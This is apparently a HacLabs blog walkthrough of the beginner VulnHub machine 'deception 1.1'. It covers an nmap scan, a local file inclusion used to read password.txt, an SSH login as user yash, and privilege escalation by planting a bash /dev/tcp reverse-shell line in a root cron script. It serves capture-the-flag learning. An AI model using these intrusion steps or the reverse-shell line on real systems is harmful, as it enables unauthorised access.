haclabs : deception 1.1

In this article we are going to solve another boot2root challenge . It is a beginner level challenge and we can download this machine from vulnhub.

To complete this challenge we need 3 flags.

Flag 2 :

We downloaded the machine as usual but when we tried to unzip it says that it is password protected and we need to crack the password to get the .ova file , otherwise we can't continue with the machine . So we noticed a note from author of the machine in the description of the machine on vulnhub website

we try to crack this hash by using different hashing methods but failed here , So the things is that it comes out to be a hex string and if use any online tool to convert hex to text we get a string "deception1.1" and yes that is the password of the zip file.

so flag2 is 646563657074696f6e312e31

Flag 1 :

Now we successfully import the machine inside the virtual box and by using the command netdiscover utility we discover the IP of the machine

and then we run a nmap scan using the command nmap -v -sV <target_ip> , we found that only two ports are open 80 and 22 , So we decided to browse HTTP Service and we found a simple password strength checker website .

This is a simple website that can check password strength . if we type in 1234 then it gives us the message

Now lets try a proper combination to make a strong password . Now after using the password Haclabs!@1 we got a pop-up.

Pop-up says : 0000flagflagflagflag.php , this means this is a webpage and if we try to open this we have an error . Now if we look carefully at the line

Now if we observe this message carefully then it says that value of flag is 1 , means directory is 00001111.php,after opening the URL we again see a pop-up.

now the pop says to find password.txt file , may be that file must have a hint or ca have something else.

We need to find password.txt file , we checked the source code of the webpage it says to use ?page= , means we can read the file it is a LFI vulnerability .

we are able to successfully read the password.txt file.

very clear from the line , means here we have to generate different combination to find the correct password and we are able to find the correct password as ya5hay ( not disclosing the actual command to get the correct combination )

Now we use this password to connect to SSH as user yash and yes we are in.

now we can find our flag in the home directory of user yash , other than this, for privilege escalation we noticed a file temp.sh that is running as cronjob by root and user yash has the permission to write this file .

we edit this file with a quick reverse shell as


bash -i >& /dev/tcp/ 0>&1

and after 1 minute we have the root shell and can read the last flag inside /root directory.

This walkthrough is contributed by mike jovani , Contact him at : mike.jovani@gmail.com

Subscribe to HacLabs newsletter

Get priority notification on the release of the latest articles.

  • YouTube
  • Twitter
  • Instagram
  • Linkedin

© 2020 by HacLabs.